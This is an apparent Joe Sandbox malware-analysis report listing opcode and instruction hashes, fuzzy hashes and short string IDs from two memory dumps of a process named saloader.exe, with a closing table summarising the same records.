                                                                                          • Instruction ID: 3cee127ad56e02d58605244782bba43fa1f85ab76a497c1cdcfba8993bd4cb01
                                                                                          • Opcode Fuzzy Hash: 26bace8277a4131f9271c6f04e2c9ec0bd85c7a10edf215f74cb59649b8058a7
                                                                                          • Instruction Fuzzy Hash: 1F81D771A1CA498FEB59EB28C455AB97BE1FF9A300F1441B9D00EC72D3CE24EC468781
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ?_H$H
                                                                                          • API String ID: 0-4044841034
                                                                                          • Opcode ID: 5c478833229f35fbf1baa66cfcedc0da2f67e569f685a34375a825c243d8f7b5
                                                                                          • Instruction ID: 2ad7962e2e0cbabc2609077ec4b29175e49883fefd25779b53c83eb695ca621d
                                                                                          • Opcode Fuzzy Hash: 5c478833229f35fbf1baa66cfcedc0da2f67e569f685a34375a825c243d8f7b5
                                                                                          • Instruction Fuzzy Hash: 0351367284D6854FEB169738AC169F57BF4EF53320B0941ABD08DDB193D92CA84A83D2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (^9O$8^9O
                                                                                          • API String ID: 0-3546416722
                                                                                          • Opcode ID: fe56f8b9583fda16d2569d6e94aa5026717c1c83aca8d0b406b2483a6f7cebef
                                                                                          • Instruction ID: aac3d7af0433120fddd859c7381fb433afa3d44cf409f9eb37b4b84b92715bf1
                                                                                          • Opcode Fuzzy Hash: fe56f8b9583fda16d2569d6e94aa5026717c1c83aca8d0b406b2483a6f7cebef
                                                                                          • Instruction Fuzzy Hash: 4A61823190DB498FFB969B6898556B97BF1FF56300F0441BBD04ED72C2DE28A8498BC1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (79O$/
                                                                                          • API String ID: 0-1687341922
                                                                                          • Opcode ID: b3942c988e2ddd46ca222080e9fdb1ff4784b7e7055521b22bf2f649ded8596d
                                                                                          • Instruction ID: f809c606683e70d8875d641579f32d02dfcaafe701f48726714a98cd48630cc2
                                                                                          • Opcode Fuzzy Hash: b3942c988e2ddd46ca222080e9fdb1ff4784b7e7055521b22bf2f649ded8596d
                                                                                          • Instruction Fuzzy Hash: 2E711E75618A4ACFDB89EF28C494BA973F1FF59300B5045A9D41ECB296CF35E846CB80
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: h^9O$p^9O
                                                                                          • API String ID: 0-1397781895
                                                                                          • Opcode ID: 2164a25933dfab699f5a799b97c6ff4055f3a3339963758ecb11f096360363cd
                                                                                          • Instruction ID: dc656ae6eeeb89e54fbbe6232831f4769cdcf55de6ca1d606766e583777548ba
                                                                                          • Opcode Fuzzy Hash: 2164a25933dfab699f5a799b97c6ff4055f3a3339963758ecb11f096360363cd
                                                                                          • Instruction Fuzzy Hash: E341EB3190EA868FF35B976888556A47FF0FF87310F4881FBD04DCB5A3D91898498B81
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ?_H$H
                                                                                          • API String ID: 0-4044841034
                                                                                          • Opcode ID: 7804f9e15c691a1562eca1aae3b0efaad02e6bdcbfb2805066840c88e3418f71
                                                                                          • Instruction ID: 1e77447755f09a244fdbe57d84578e9ec18cea9ee0527715b41ee9418d73da06
                                                                                          • Opcode Fuzzy Hash: 7804f9e15c691a1562eca1aae3b0efaad02e6bdcbfb2805066840c88e3418f71
                                                                                          • Instruction Fuzzy Hash: 9C319572D1CA198FEB58E76C944AAB977E1EF99350F00417ED40EE3252EE24A84547C1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (79O$@79O
                                                                                          • API String ID: 0-4115383582
                                                                                          • Opcode ID: 7ca6cbf86243579fd7bf8a83079e9d8e7c79b533d1b5651c192f16148c035bff
                                                                                          • Instruction ID: 98ac9071c5b2fb69a32c7bdd73f97ccc04560a36aff953ad742f1484b09a4763
                                                                                          • Opcode Fuzzy Hash: 7ca6cbf86243579fd7bf8a83079e9d8e7c79b533d1b5651c192f16148c035bff
                                                                                          • Instruction Fuzzy Hash: CD31D331D2995A8FEB45EB28C855AF9B7F0FF4A301F0450B6E00DD71A3DE28A945C790
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8\9O$69O
                                                                                          • API String ID: 0-1095183992
                                                                                          • Opcode ID: 251fb6417f2f709549fb18ced3807c60a0766984f7f39cefe32d36ea68bfe6e9
                                                                                          • Instruction ID: 896ab5759b42c448be326043aed2fa00c246e8bad4e4502f09495c8a87628cf5
                                                                                          • Opcode Fuzzy Hash: 251fb6417f2f709549fb18ced3807c60a0766984f7f39cefe32d36ea68bfe6e9
                                                                                          • Instruction Fuzzy Hash: 8401C421A0D7474FE7869B3894556647BE0EF46350F0400BBD84DCB1E3DD6C9DC58341
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8\9O$69O
                                                                                          • API String ID: 0-1095183992
                                                                                          • Opcode ID: d68c5978871cac002c5afef24192a13b1ee4fd05a77f4e6c3b697eb646f6a878
                                                                                          • Instruction ID: 7b9879b9e51dfa93aa80df598ecb405e09e21fc1d3ce7db66bef7020a427e111
                                                                                          • Opcode Fuzzy Hash: d68c5978871cac002c5afef24192a13b1ee4fd05a77f4e6c3b697eb646f6a878
                                                                                          • Instruction Fuzzy Hash: 5401B121A0DA0A4FF786AA3C9855A647BE0EB46350F0401BBE80ECB1E3ED589C864381
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x69O
                                                                                          • API String ID: 0-1204690934
                                                                                          • Opcode ID: 9eacedcda9f9e1bfae032e2da88aa9ba3e2b72170d31955818157d4ba9318466
                                                                                          • Instruction ID: 1fc74e45ceea14da56d484c2af510131160eb86f80d19dbbefcdcc7c13f97d77
                                                                                          • Opcode Fuzzy Hash: 9eacedcda9f9e1bfae032e2da88aa9ba3e2b72170d31955818157d4ba9318466
                                                                                          • Instruction Fuzzy Hash: 9812683061C9498FEB69DB1CE495BB933D1EF99300F1490BEE44EC72A7CE24EC458685
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: b4
                                                                                          • API String ID: 0-3371602342
                                                                                          • Opcode ID: c197c76e45b3024ff8f8b399b8204f79f643eaebb865440988114a7d401e0e51
                                                                                          • Instruction ID: 37e3204a76bbe1d316c64ce12fb637762d7bb758d30c216863a35c504e366cd1
                                                                                          • Opcode Fuzzy Hash: c197c76e45b3024ff8f8b399b8204f79f643eaebb865440988114a7d401e0e51
                                                                                          • Instruction Fuzzy Hash: A212133191DB4A8FE76ADB28C485571B7E0FF56300B24967DD08EC7692DA24F84AC7C1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6
                                                                                          • API String ID: 0-1452363761
                                                                                          • Opcode ID: 0aa8b53b6e82db5a83351e2dd8f872ff10871afaa54c36ce098a869e53274ac1
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: KL
                                                                                          • API String ID: 0-2295730153
                                                                                          • Opcode ID: 6445e0c596c5ee0b24c13aa6c6193eb50467b95c34b4857fc513fe22886ac357
                                                                                          • Instruction ID: 525e25bf8eeffe1182fb9a74ba4a66877a249186d947030b1589a94205544434
                                                                                          • Opcode Fuzzy Hash: 6445e0c596c5ee0b24c13aa6c6193eb50467b95c34b4857fc513fe22886ac357
                                                                                          • Instruction Fuzzy Hash: 7B31A47152C9494FEB4DEB28D8869F937D0FBA9310F10502EF44FC3697DD24E8464285
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x69O
                                                                                          • API String ID: 0-1204690934
                                                                                          • Opcode ID: 3b74aa5a291964f3785b17a54510ab7e97dc9228efde499e9e6d78c22fc63b43
                                                                                          • Instruction ID: 6035f396578ae122c470a402a2307da5f9b085b53fffe8f3a35a330a860f9fde
                                                                                          • Opcode Fuzzy Hash: 3b74aa5a291964f3785b17a54510ab7e97dc9228efde499e9e6d78c22fc63b43
                                                                                          • Instruction Fuzzy Hash: D231D231E08A4E8FDB86DF28C4006AAB7F1FF46350F4441BAD81DD7252CA38AC458BD0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8!
                                                                                          • API String ID: 0-3454247621
                                                                                          • Opcode ID: 980cdffe7484f5251d4578d937d07fc0ed83646008c1715b2341993a57b13dc7
                                                                                          • Instruction ID: 4e3d3cfe12b66c8471c7e2a28e14e9aeae9dd22e1d05d495b9068b4aeb19dd6c
                                                                                          • Opcode Fuzzy Hash: 980cdffe7484f5251d4578d937d07fc0ed83646008c1715b2341993a57b13dc7
                                                                                          • Instruction Fuzzy Hash: 8D218362B1894A8FEF84EB7C9455BB9B7D1EB98311B0481BAE10EC32D7DD18DC064781
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: [9O
                                                                                          • API String ID: 0-158884040
                                                                                          • Opcode ID: f29cd29bafde8589a1463ceaaacd6bd767289b4c04c5518256c0172234eb305e
                                                                                          • Instruction ID: 29eac8f8caff4eb38f3201adca687220000f5ea580aa89f35e6e01e4d81b9755
                                                                                          • Opcode Fuzzy Hash: f29cd29bafde8589a1463ceaaacd6bd767289b4c04c5518256c0172234eb305e
                                                                                          • Instruction Fuzzy Hash: 6C21C55A91C2999FEB42B77CE8615F97FB0EF46364B0481B3D188CE1B3DC18948A8391
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x69O
                                                                                          • API String ID: 0-1204690934
                                                                                          • Opcode ID: 01da3eadac3ef9062404a70be7dfe99ca893e06a527ddf7b780f8f823b37c8d5
                                                                                          • Instruction ID: 5a4f31422644f093913ffae2ef2021f18e165cbfb0a7f2c75d95966212b0a854
                                                                                          • Opcode Fuzzy Hash: 01da3eadac3ef9062404a70be7dfe99ca893e06a527ddf7b780f8f823b37c8d5
                                                                                          • Instruction Fuzzy Hash: A501C021A09A4A4FEB86EB7C98956B4B7E1EF9A31070540F6D00CCB297D928DC458381
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: X^9O
                                                                                          • API String ID: 0-2704812624
                                                                                          • Opcode ID: d4aa6cb44cfd8fe31f437d49080f96bd6e95c00fa08e43ad8967ebba0f438c1d
                                                                                          • Instruction ID: b216c06a33fbcf3cb8f8ed1e01cdf41db85610a996fc8c8537ca4f41cd275a18
                                                                                          • Opcode Fuzzy Hash: d4aa6cb44cfd8fe31f437d49080f96bd6e95c00fa08e43ad8967ebba0f438c1d
                                                                                          • Instruction Fuzzy Hash: 8411D32680E586CFF7579B2488216A57BF0EF93310F5845FEC44DCB292D928984E8A91
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: H79O
                                                                                          • API String ID: 0-3056045408
                                                                                          • Opcode ID: 77c7d0b053a6bc42543086c3cca80ccb52e9672edceb10162bb9064b6823bf2a
                                                                                          • Instruction ID: 892808c70090e5f402212fc71629a176ec9554da5c0f5ef6f0bdace8f4928008
                                                                                          • Opcode Fuzzy Hash: 77c7d0b053a6bc42543086c3cca80ccb52e9672edceb10162bb9064b6823bf2a
                                                                                          • Instruction Fuzzy Hash: 6B018862A4894D4FEB85FB78C419BA9B6E6FF8A301F0504F6E40EC72A2DD289C454781
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: >
                                                                                          • API String ID: 0-3434628772
                                                                                          • Opcode ID: 3736ae88662765ee07de8bef6dd82bc7231f118dbf8bf4899cc7de6883341ebf
                                                                                          • Instruction ID: bdbf8e83e03ecf99144702a2b2f3b2976136894f30cb8a453a3fc9dce8875ef1
                                                                                          • Opcode Fuzzy Hash: 3736ae88662765ee07de8bef6dd82bc7231f118dbf8bf4899cc7de6883341ebf
                                                                                          • Instruction Fuzzy Hash: 45F0B46260EAD59FE766E33C88586617FE1EF4B310B1944EAD0CCCB5A3C5558C08C392
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 01f436f33d9ec0cbda2d89bbfd7e39eb9e36843ba326fc2f6336874b073bfaf6
                                                                                          • Instruction ID: b19329e99f6464ac5d17696e7d1131aca5cbdd5d15c35f6c2b51a66ba3df70e7
                                                                                          • Opcode Fuzzy Hash: 01f436f33d9ec0cbda2d89bbfd7e39eb9e36843ba326fc2f6336874b073bfaf6
                                                                                          • Instruction Fuzzy Hash: 2B72C23060890A8FEBD6EF2CD458AA577E1FF9A34071550FAD44DCB2A3EE25EC458790
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a3675825401346364968fb115cd2e1390dde1d82d4fe5e95ca36d9561f32a30f
                                                                                          • Instruction ID: ffeaa72d87a0d5ea09d1fdc6e246d11ca023a948a46107577c17f5a457e3be4c
                                                                                          • Opcode Fuzzy Hash: a3675825401346364968fb115cd2e1390dde1d82d4fe5e95ca36d9561f32a30f
                                                                                          • Instruction Fuzzy Hash: D2621671A1EA4E8FFB9ADB2C94556743BD1EF86310B1491BED04FC7192DE25EC0A8381
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c789b830a9bd7936dc6e1457e7e2e7a38b4f2cfa24841ec5fb7711bc89004f8d
                                                                                          • Instruction ID: 89e3c8032ce22bf00e2e7b0b820829d334176d318da16c8f988273421271f936
                                                                                          • Opcode Fuzzy Hash: c789b830a9bd7936dc6e1457e7e2e7a38b4f2cfa24841ec5fb7711bc89004f8d
                                                                                          • Instruction Fuzzy Hash: 7A529431918B4A8FDB56DF78C851A94BBF1FF56300F4401EAE449CB292EE38AC85CB51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e28b0cb4dace17f070ecaacb931b2da4ac5319612392aaad1f129f89863bad02
                                                                                          • Instruction ID: d8b2c7c2b6c4ca37319b3c3c063254289a590ede817821804cb198f53698ae54
                                                                                          • Opcode Fuzzy Hash: e28b0cb4dace17f070ecaacb931b2da4ac5319612392aaad1f129f89863bad02
                                                                                          • Instruction Fuzzy Hash: A942D174E18A4ACFEB85EB98C841BA9B7F1FF49340F1141B5D40DD7286DE38AC868B51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 60d6e3f84b1cd80c7df8be4092a864e1b5cbbac0c42e2447abacd3ce72d1c21b
                                                                                          • Instruction ID: 7c4f4866529570b0b11cf91364dce6703d99556b56f95e8b3dc3773b81c988c0
                                                                                          • Opcode Fuzzy Hash: 60d6e3f84b1cd80c7df8be4092a864e1b5cbbac0c42e2447abacd3ce72d1c21b
                                                                                          • Instruction Fuzzy Hash: 4542D074E18A4ACFEB85DB98C841BA9B7F1FF4A350F1141B5D40DD3286DE38AC868B51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3078aa7d9d55df3d299f3a97aeb80f755867401ccae56adf5c86469a7ce98d4a
                                                                                          • Instruction ID: 1e4ede08af856ed827e02bc0994f5fb979516dc7e1715fd64f6dfcf9f522508f
                                                                                          • Opcode Fuzzy Hash: 3078aa7d9d55df3d299f3a97aeb80f755867401ccae56adf5c86469a7ce98d4a
                                                                                          • Instruction Fuzzy Hash: C6127C3071990D8FEBA5EB2CD458A7477E2EFA9300B1551FAE40ECB2A6DE24DC458781
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d29f31a20123320b16a49fb97e6409be355f8943cfecd8c18e7a7e9874043a4a
                                                                                          • Instruction ID: 56198ecd95de337462b639ad542807137aa6791f7ea433a9d5c473584585ae49
                                                                                          • Opcode Fuzzy Hash: d29f31a20123320b16a49fb97e6409be355f8943cfecd8c18e7a7e9874043a4a
                                                                                          • Instruction Fuzzy Hash: 1BF10321A1EE4A8FFAEAC71C8690635B6D1FF5A200B4861BAD41EC35C7ED14EC4983C5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd6e059a3167befc525870a2cdb78a29a23b2a355d98906734db638861c5846d
                                                                                          • Instruction ID: fa0f7326a74d39edcc136f9e8484043b45793e5a74c4b1709fccb62baa4c5790
                                                                                          • Opcode Fuzzy Hash: fd6e059a3167befc525870a2cdb78a29a23b2a355d98906734db638861c5846d
                                                                                          • Instruction Fuzzy Hash: 54F1E773A1DA4A8FF799DB2C94546B57BE1FF9A314B0480BAD04DC7296DE24EC0983C1
                                                                                          Memory Dump Source
The records in this range come from two memory dumps of saloader.exe, neither of which is backed by a PE image on disk (based on PE: false). All were produced by the Joe Sandbox IDA Plugin. In every record the Similarity fields API ID, String ID and API String ID are empty, and Opcode Fuzzy Hash is identical to Opcode ID, so the table lists Opcode ID once.

Dump A: Source File 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset 00007FFAAC610000, Snapshot File hcaresult_0_2_7ffaac610000_saloader.jbxd
Dump B: Source File 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset 00007FFAAC7D0000, Snapshot File hcaresult_0_2_7ffaac7d0000_saloader.jbxd

Dump | Opcode ID (= Opcode Fuzzy Hash) | Instruction ID | Instruction Fuzzy Hash
A | 860a9ff716cd0cd98a3b629e30e1bc216047c9e835493f82eb6679f1b6656bdd | 6ed771960a56aa24395cf7414f1d842d4419cda6da42dca6e591ac264f7e9c63 | 3DF1D571A18A4E8FFB99DB6CC895AB877E1FF59300B2451BDD04DC7296DE24EC068780
A | 41e549430cd8153d772868a1b47e55e0342b1aac152473f317ef91ba14eac5b1 | c784704ef49cb7d79b294a9ebb3e8402cf0378dbcfb075e7388298cbd1fc17bc | 95F1233091DA4A8FE76ADB28C4855B5B7E0FF96300F24957DD08EC3692DE25E84A87C1
B | 68f977de2b6bcdcd2ab202a5ae5f94e8ed0767fea6d5b82421ca0d04d6062851 | 46cef9352e4648c74f2125f5170e6d02058d78ad00e5becd328c86fe99c0baeb | 60E10A34919A4A8FFB96EB28C855AB577F1FF56300F0485BAD41DC7192DE38E8068B81
B | 31d43a34a535eb4a405d600f6c45b4c383d36923ecdf0898e6e77fbf64c82373 | 00c4bdfd6f3dac001a8eceb46d3f7d28f06dbea0092c7b38395b3524d5832aa2 | 37C11256A1EAC78FE796973898656B57FF0FF46200B0881FBD04DC7197DD18E80A8781
A | d52f4ffda9a15307d651f05bb2bd94b12534b58613f2021e557d574b769bd183 | ba2ce6858d4b039dc4bdc02e170153bf010683788edbc83992d99a43a0e8da4b | 6DA1F171A0DA498FF76ADB2C984A6B07BC0EF96710B1562BEE04DC31A7DD15EC4683C0
B | 272c6e3c5a3d8682aef9a2d05091f3c6addb35ffd7936efee8cf69ba88f6e778 | d048cd7b15d5f7d4fe5e93910e08a9f9682bc9cd67a4f885bceef4f1e8dc8040 | D3C1FA72A0EB498FE796973884553B57BE1FF56310F4445BED08EC76A2DF28A809C381
A | 6f25b07346ae6b0e4ea8669d59b241c709168078abe57d71f0d645bfc0440ae1 | a635ba6fa2364730d582ebeae38c0d41c82fe5703c3c844258fead3b6a10287d | 42B1B371A19A0E8FEBA9EB18C045A7673D1FF99300F20A57DD45FC3196DE28F8468781
A | 5cfc7757a5f029a98898ddae929de62d362ec157e902bb6dd992b13e06bd317b | acbf1ee7aeb71a59b9b57d6acb865f3515f38049837ffd1afb9b6b84394252b5 | A3C17030A19A4ACFFBA9DB28C480776F7D1FF55308F54A4B9C44EC6585CA79E889C780
A | 280ed008668dcfac602b063c69cfba9bed0ae58d5f26b171c6257d2e719cfed4 | 6660782f9043930ee10c2bd263826e331694356dcbd81f20378792a3ea265e01 | DC913672E1DE0D8FFB59DB1C98592B937D1EF99321B18527EE44DC3292ED20E80642C1
B | ee4962e8062609707451091b608b2ed17bc4f06b42c73b0a77d9d5330d775afb | 84441da0c878131cd0cd3df0ffc939115086d678127db946bfc3ef478fc48134 | 46A1F472A0DA498FFB9A9B1888157B977E1FF96310F0441BAD04ED7292DE21ED458BC0
A | 26f65739d25d4b4509058898d50d3e1c7893ae2512037586f48f69fb97987b70 | 46cc7d04f77ba0f1b95bb5a0b807eefe085ea3e1e053b739bb8b14016e904450 | 80B14C30619909CFEB95EF2CC598BA577E1FF5A300F0451B9E44ECB2A6DA24EC44CB91
B | ce4d2c46bc3b165e4ed3b6586531f957ff4a77d25c0c7e3440e1716f74cd384c | cc3a16a729bf17c972bd30aec9d3697dae518379f16abeef7dfc7ba5e3243e4a | 57913B12A0DE4A4FF7A5A73C94566743BE1EF9A210B4940FAD04DC71A3DE1CDC4A83C1
B | d080e5b342f2d8dea0e69011867caffcbd2756e359b86f5c696818015619819d | fde10901ea0d1b99ee9bdd3b4a23f1353690728ee5b3f89c9600813ea9a16eb2 | C6910A71A0DA4A8FFB56DB2884517A97BE1EF85300F0841B6D54DC718BDE24DC49CBC1
A | 0b3b27cd891770b93b7a8b1825206e037596476015965f59b297b1c4ed7339e6 | 4a37dd1220605be54940f161f81edcf39869f89cbf2d496fc90d4a3790d05bfc | D0C1BE74504A4E8FEBC5EF18C49CBA937E1FB68305F24457E982DCB295DB369896CB00
